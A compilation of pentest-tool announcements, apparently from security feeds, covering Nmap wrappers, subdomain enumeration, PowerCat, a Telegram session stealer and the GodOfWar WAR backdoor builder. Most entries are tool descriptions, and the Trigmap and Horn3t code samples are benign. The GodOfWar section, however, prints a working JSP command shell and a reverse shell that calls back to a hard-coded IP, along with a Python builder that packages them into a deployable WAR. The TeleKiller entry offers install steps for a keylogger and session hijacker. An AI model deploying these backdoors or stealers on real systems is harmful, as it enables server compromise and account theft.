Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scans and, in particular, to collect the results into a well-organized directory hierarchy. Because it relies only on Nmap, the script is portable (easy to run not only on Kali Linux) and efficient thanks to Nmap's optimized scan algorithms.

Details

Trigmap can perform several tasks using the Nmap Scripting Engine (NSE):
- Port scan
- Service and version detection
- Web resources enumeration
- Vulnerability assessment
- Common vulnerabilities test
- Common exploits test
- Dictionary attacks against active services
- Default credentials test

Usage

Trigmap can be used in two ways:

Interactive mode: run trigmap [ENTER], and the script does the rest.

Non-interactive mode:
    trigmap -h|--host [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases]

If you want to see the help, run trigmap --help.

For more screenshots see the relative directory of the repository.

Dir Hierarchy

Customization

It is possible to customize the script by changing the value of the variables at the beginning of the file. In particular you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).

    ################################################
    # PARAMETERS
    ################################################
    GENERAL_USER_LIST='general_user_wordlist_short.txt'
    WIN_USER_LIST='win_user_wordlist_short.txt'
    UNIX_USER_LIST='unix_user_wordlist_short.txt'
    SHORT_PASS_LIST='fasttrack.txt'
    LONG_PASS_LIST='rockyou.txt'

    ################################################
    # NMAP SETTING
    ################################################
    # PE (echo req), PP (timestamp-request)
    # you can add a port on every ping scan
    NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'
    NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'
    SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'
    SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'
    SCRIPT_ARGS="userdb=$GENERAL_USER_LIST,passdb=$SHORT_PASS_LIST"
    CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN

Two things to check before pointing these at a live target: the "vuln", "exploit" and "brute" categories and the dictionary attacks are intrusive (lockouts, crashes, noise in the target's logs), and in NSE script expressions "and" binds more tightly than "or" (Lua precedence), so "not dos" in SCRIPT_VA and SCRIPT_BRUTE only qualifies the last category; parenthesize the whole list if you want dos scripts excluded from every category.

Twin Brother

This project is very similar to Kaboom, but it has a different philosophy: it uses only Nmap, while Kaboom uses a different tool for each task. The peculiarity of Trigmap is its portability and efficiency, but it is recommended to use both tools to scan the targets, so as to gather more evidence with different tools (redundancy and reliability).

Download Trigmap
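The part of Trigmap that is easy to overlook is the "well-organized directory hierarchy": a wrapper is only useful if the Nmap output ends up somewhere a tester can find it per host, per phase and per port. The following added example (not Trigmap's own code, which is a shell script) shows one way to do that from Nmap's XML output (-oX): parse the open ports, service/version strings and NSE script results, then write one file per open port under <base>/<host>/<phase>/<proto>/. The SAMPLE_XML document is constructed for this example, and the directory layout and the "service-detection" phase name are this example's choices, not Trigmap's actual layout.

```python
"""Parse Nmap -oX output and file it into a per-host directory tree,
the way a Trigmap-style wrapper organizes its evidence.
Added example; not Trigmap's own code."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed nmap -oX output, trimmed to the elements used below.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script=(auth or vuln) 10.0.0.5">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
        <script id="ssh-auth-methods" output="publickey,password"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.6"/>
        <script id="http-title" output="Welcome"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed"/>
        <service name="telnet"/>
      </port>
      <port protocol="udp" portid="161">
        <state state="open|filtered"/>
        <service name="snmp"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {addr: {"tcp": {port: info}, "udp": {port: info}}} with open ports only."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        entry = {"tcp": {}, "udp": {}}
        for port in host.iter("port"):
            state = port.find("state").get("state")
            if not state.startswith("open"):      # keeps "open" and "open|filtered"
                continue
            svc = port.find("service")
            name, product = "", ""
            if svc is not None:
                name = svc.get("name", "")
                product = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            entry[port.get("protocol")][int(port.get("portid"))] = {
                "state": state,
                "service": name,
                "product": product,
                # NSE results are attached to the port they ran against
                "scripts": {s.get("id"): s.get("output", "") for s in port.findall("script")},
            }
        hosts[addr_el.get("addr")] = entry
    return hosts


def write_hierarchy(hosts, base_dir=None, phase="service-detection"):
    """Write <base>/<host>/<phase>/<proto>/<port>_<service>.txt per open port; return the paths."""
    base_dir = base_dir or tempfile.mkdtemp(prefix="trigmap-")   # assumption: temp dir when unset
    written = []
    for addr, protos in hosts.items():
        for proto, ports in protos.items():
            for port, info in sorted(ports.items()):
                d = os.path.join(base_dir, addr, phase, proto)
                os.makedirs(d, exist_ok=True)
                path = os.path.join(d, f"{port}_{info['service'] or 'unknown'}.txt")
                with open(path, "w") as fh:
                    fh.write(f"{proto}/{port} {info['state']} {info['service']} {info['product']}\n")
                    for sid, out in info["scripts"].items():
                        fh.write(f"[{sid}] {out}\n")
                written.append(path)
    return written


if __name__ == "__main__":
    for p in write_hierarchy(parse_nmap_xml(SAMPLE_XML)):
        print(p)
```

In a real run you would feed it the XML Nmap writes with -oX for each phase (ping sweep, port scan, service detection, NSE) and pass the phase name through, so the tree mirrors Trigmap's phases rather than one flat directory.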

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

Horn3t – Powerful Visual Subdomain Enumeration At The Click Of A Mouse

Horn3t is your Nr #1 tool for exploring subdomains visually. Building on the great Sublist3r framework (or extensible with your favorite one), it searches for subdomains and generates picture previews. Get a fast overview of your target with HTTP status codes, add custom found subdomains and directly access found URLs with one click.

- Recon your targets at blazing speed
- Enhance your productivity by focusing on interesting-looking sites
- Enumerate critical sites immediately
- Sting your target

Installation
- Install Google Chrome
- Install requirements.txt with pip3
- Install the requirements.txt of sublist3r with pip3
- Put the directory within the web server of your choice
- Make sure to have the right permissions
- Run horn3t.py

Or alternatively use the install.sh file with Docker. Afterwards you can access the web portal under http://localhost:1337

Todo
- Better scaling on Firefox
- Add Windows Dockerfile
- Direct Nmap support per click on a subdomain
- Direct Dirb support per click on a subdomain
- Generate PDF reports of found subdomains
- Assist with subdomain takeover

Credits
- aboul3la: the creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of Sublist3r.
- TheRook: the bruteforce module was based on his script subbrute.
- bitquark: Subbrute's wordlist was based on his research dnspop.

Tested on Windows 10 and Debian with Google Chrome/Chromium 73

Download Horn3t
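Horn3t's two building blocks are a subbrute-style wordlist brute force and an HTTP status overview of whatever resolved. The added example below (not Horn3t's or Sublist3r's code) implements both with a pluggable resolver so it can be exercised offline: a wildcard probe first, so a zone that answers every name does not produce hundreds of false hits, then a threaded resolve of each candidate, then grouping of the survivors by HTTP status. FAKE_ZONE, FAKE_STATUS and the probe label are constructed for the example; swap in dns_resolver and http_status for a real target you are authorized to test.

```python
"""Wordlist subdomain enumeration plus an HTTP status overview, in the
spirit of Horn3t/subbrute. Added example; not Horn3t's own code."""
import http.client
import socket
from concurrent.futures import ThreadPoolExecutor


def dns_resolver(name):
    """Real resolver: sorted A records for name, or [] when it does not resolve."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def enumerate_subdomains(domain, words, resolver=dns_resolver, workers=16):
    """Return {fqdn: [ips]} for every word that resolves, minus wildcard answers."""
    # Wildcard check: if a label that should not exist resolves, every label will.
    # (Probe label is this example's choice, not Horn3t's.)
    wildcard = set(resolver(f"horn3t-wildcard-probe.{domain}"))
    candidates = [f"{w.strip().lower()}.{domain}" for w in words if w.strip()]
    found = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for fqdn, ips in zip(candidates, pool.map(resolver, candidates)):
            if ips and set(ips) != wildcard:
                found[fqdn] = ips
    return found


def http_status(fqdn, timeout=5):
    """HEAD / over plain HTTP; return the status code or None when unreachable."""
    try:
        conn = http.client.HTTPConnection(fqdn, 80, timeout=timeout)
        conn.request("HEAD", "/")
        return conn.getresponse().status
    except OSError:
        return None


def status_overview(found, prober=http_status):
    """Group found hosts by HTTP status so the interesting ones stand out."""
    groups = {}
    for fqdn in sorted(found):
        groups.setdefault(prober(fqdn), []).append(fqdn)
    return groups


# Constructed zone and status table used by the stand-alone run.
FAKE_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.20"],
    "dev.example.test": ["192.0.2.30"],
}
FAKE_STATUS = {"www.example.test": 200, "dev.example.test": 403}


def fake_resolver(name):
    return FAKE_ZONE.get(name, [])


if __name__ == "__main__":
    words = ["www", "mail", "dev", "staging", "vpn"]
    hits = enumerate_subdomains("example.test", words, resolver=fake_resolver)
    for status, hosts in status_overview(hits, prober=FAKE_STATUS.get).items():
        print(status, hosts)
```

The wildcard check is the detail that separates a usable brute forcer from a noise generator: without it, a zone with *.example.test configured returns every word in the list as a "finding".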

Link: http://www.kitploit.com/2019/05/horn3t-powerful-visual-subdomain.html

PowerCat -A PowerShell Netcat

The name PowerCat comes from "PowerShell Netcat": it is a version of netcat written as a PowerShell script. In this article, we will learn about powercat, a PowerShell tool for exploiting Windows machines. Table of Content: Requirement & Installations; Testing PowerShell Communication; Bind Shell; Execute Shell; Tunnelling or port forwarding… Continue reading →
The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/powercat-a-powershell-netcat/

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set up our own web server for penetration testing on Ubuntu 18.04. Table of Content: Requirement; Web Server configuration; Apache; PHP; MySQL; phpMyAdmin; FTP; SSH; Nmap. Requirement: Ubuntu 18.04. Web Server Configuration: a web server is a program that uses HTTP to serve users with the files forming web pages, in response to requests transmitted by their HTTP clients; the term is also used for the dedicated computers and appliances that run it. Install Apache: first, we will install Apache…. Continue reading →
The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in this… Read more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated pentest tools designed for Parrot Linux. This tool automates basic pentesting tasks such as information gathering, security auditing and reporting; every task runs fully automatically.

Usage Guide

Download / clone:
    ~# git clone https://github.com/baguswiratmaadi/reverie
Go inside the reverie dir:
    ~# cd reverie
Give permission to reverie (the README uses chmod 777; chmod +x *.sh is all that is needed, and world-writable scripts that are run as root are a hazard):
    ~# chmod 777 *.sh
Run reverie without installing:
    ~# ./reverie.sh
If you want to install reverie:
    ~# ./install.sh

Changelog
- 1.0 First release
- 1.1 Fixed error in the Nikto command line

Pentest tools auto-executed with Reverie:
- Whois lookup
- DNSwalk
- Nmap
- Dmitry
- Whatweb
- wafw00f
- Load Balancing Detector
- SSLyze
- TLSSled
- Automater
- Nikto
- And more tools soon

Screenshots: preview of Reverie Auto Pentest, tools preview, output result, report in HTML.

Disclaimer: Do not scan government and private IT objects without legal permission. Do it at your own risk.

Download Reverie

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

TeleKiller – A Tool Session Hijacking And Stealer Local Passcode Telegram Windows

A tool for session hijacking and stealing the local passcode of Telegram on Windows.

Features:
- Session hijacking
- Stealer of the local passcode
- Keylogger
- Shell
- Bypass 2-step verification
- Bypass AV (coming soon)

Installation (Windows):
    git clone https://github.com/ultrasecurity/TeleKiller.git
    cd TeleKiller
    pip install -r requirements.txt
    python TeleKiller.py

Dependencies:
- Python 2.7
- pyHook
- pywin32

Video Tutorial

Operating systems tested:
- Windows 10
- Windows 8.1
- Windows 8
- Windows 7

Contact
- Website, Ultra Security Team: https://ultrasec.org
- Telegram channel: https://t.me/UltraSecurity

Thanks to: Milad Ranjbar, MrQadir

Download TeleKiller

Link: http://www.kitploit.com/2019/04/telekiller-tool-session-hijacking-and.html

GodOfWar – Malicious Java WAR Builder With Built-In Payloads

A command-line tool to generate WAR payloads for penetration testing / red teaming purposes, written in Ruby.

Features
- Preexisting payloads (try -l/--list): cmd_get, filebrowser, bind_shell, reverse_shell, reverse_shell_ui
- Configurable backdoor (try --host/--port)
- Control over the payload name, to avoid a suspicious name after deployment and bypass URL-name signatures

Installation
    $ gem install godofwar

Usage
    $ godofwar -h
    Help menu:
        -p, --payload PAYLOAD   Generates war from one of the available payloads. (check -l/--list)
        -H, --host IP_ADDR      Local or Remote IP address for the chosen payload (used with -p/--payload)
        -P, --port PORT         Local or Remote Port for the chosen payload (used with -p/--payload)
        -o, --output [FILE]     Output file and the deployment name. (default is the payload original name. check '-l/--list')
        -l, --list              list all available payloads.
        -h, --help              Show this help message.

Example

List all payloads:
    $ godofwar -l
    ├── cmd_get
    │   └── Information:
    │       ├── Description: Command execution via web interface
    │       ├── OS: any
    │       ├── Settings: {"false"=>"No Settings required!"}
    │       ├── Usage: http://host/cmd.jsp?cmd=whoami
    │       ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
    ├── filebrowser
    │   └── Information:
    │       ├── Description: Remote file browser, upload, download, unzip files and native command execution
    │       ├── OS: any
    │       ├── Settings: {"false"=>"No Settings required!"}
    │       ├── Usage: http://host/filebrowser.jsp
    │       ├── References: ["http://www.vonloesch.de/filebrowser.html"]
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
    ├── bind_shell
    │   └── Information:
    │       ├── Description: TCP bind shell
    │       ├── OS: any
    │       ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
    │       ├── Usage: http://host/reverse-shell.jsp
    │       ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
    ├── reverse_shell_ui
    │   └── Information:
    │       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
    │       ├── OS: any
    │       ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
    │       ├── Usage: http://host/reverse_shell_ui.jsp
    │       ├── References: []
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
    ├── reverse_shell
    │   └── Information:
    │       ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
    │       ├── OS: any
    │       ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
    │       ├── Usage: http://host/reverse_shell.jsp
    │       ├── References: []
    │       └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Generate a payload with LHOST and LPORT:
    $ godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

After deployment, you can visit your shell at http://host:8080/puppy/puppy.jsp

Contributing
- Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
- Create your feature branch (git checkout -b my-new-feature).
- Commit your changes (git commit -am 'Add some feature').
- Push to the branch (git push origin my-new-feature).
- Create a new Pull Request.

Add More Backdoors

To contribute by adding more backdoors:
- Create a new folder under the payloads directory.
- Put your JSP file under the newly created directory (give it the same name as the directory).
- Update the payloads_info.json file with: description; supported operating system (try to make it universal, though); configurations: default host and port; references: the payload origin or its creator credits.

Download Godofwar
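What GodOfWar actually produces is simple: a WAR is a zip archive with a WEB-INF/web.xml and the JSP at the root, so the deployment name and the file name inside the archive decide the URL (the "puppy" above becomes /puppy/puppy.jsp), and LHOST/LPORT are just string substitutions into the JSP before packaging. The added example below (this page's own illustration in Python, not GodOfWar's Ruby code) shows those three steps end to end: fill the placeholders, refuse a deployment name that is not a plain identifier (a name like ../x would otherwise land in the archive path), and build the archive in memory. The JSP templates, the placeholder names __LHOST__/__LPORT__ and the minimal web.xml are constructed for the example.

```python
"""Build a deployable WAR around a JSP payload with a chosen deployment name,
the way a GodOfWar-style builder does. Added example; not GodOfWar's code."""
import io
import zipfile

# Constructed "command via GET parameter" page, in the style of the laudanum JSP
# the cmd_get payload references.
CMD_GET_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>"""

# Constructed reverse-shell template; __LHOST__/__LPORT__ are this example's
# placeholders, filled in the way -H/-P hard-code host and port.
REVERSE_SHELL_JSP_TEMPLATE = r"""<%@ page import="java.net.*,java.io.*" %>
<%
Socket s = new Socket("__LHOST__", __LPORT__);
Process p = new ProcessBuilder("/bin/sh").redirectErrorStream(true).start();
InputStream pi = p.getInputStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    try { Thread.sleep(50); } catch (InterruptedException e) { break; }
}
%>"""

# Minimal deployment descriptor; the welcome-file makes /<name>/ serve the JSP.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list><welcome-file>{name}.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def render_payload(template, host=None, port=None):
    """Hard-code LHOST/LPORT into a template; fail if a placeholder is left unfilled."""
    jsp = template
    if host is not None:
        jsp = jsp.replace("__LHOST__", host)
    if port is not None:
        jsp = jsp.replace("__LPORT__", str(int(port)))
    if "__LHOST__" in jsp or "__LPORT__" in jsp:
        raise ValueError("this payload needs both host and port")
    return jsp


def build_war(jsp_source, name):
    """Return WAR bytes: <name>.jsp at the root plus WEB-INF/web.xml pointing at it."""
    # The name becomes a path inside the archive and a URL segment: keep it boring.
    if not name.replace("_", "").replace("-", "").isalnum():
        raise ValueError("deployment name must be a simple identifier")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(name=name))
        war.writestr(f"{name}.jsp", jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List archive members: what to look for when auditing a deployed WAR."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


if __name__ == "__main__":
    jsp = render_payload(REVERSE_SHELL_JSP_TEMPLATE, "192.168.100.10", 9911)
    data = build_war(jsp, "puppy")
    with open("puppy.war", "wb") as fh:
        fh.write(data)
    print(war_entries(data), "-> deploy, then visit http://host:8080/puppy/puppy.jsp")
```

The same archive layout is what a defender should look for after an incident on a Tomcat or JBoss host: a freshly deployed WAR whose only content is one JSP and a stub web.xml is the signature of this whole class of tools, whatever the file is called.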

Link: http://feedproxy.google.com/~r/PentestTools/~3/48DUIB_ttEQ/godofwar-malicious-java-war-builder.html

Beginner’s Guide to Nessus

In this article, we will learn about Nessus, a network vulnerability scanner. There are various network vulnerability scanners, but Nessus is one of the best because of its mature GUI, which is why it is widely used across organizations. The tool was originally developed by Renaud Deraison in 1998. Table of Content… Continue reading →
The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/beginners-guide-to-nessus/

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RPC servers. It is a good tool for beginners to understand how Metasploit works, as it generates payloads and lets you interact with sessions. As the tool is still under development, so far it only supports windows/meterpreter and android/meterpreter. For it to work, you should have… Continue reading →
The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/kage-graphical-user-interface-for-metasploit/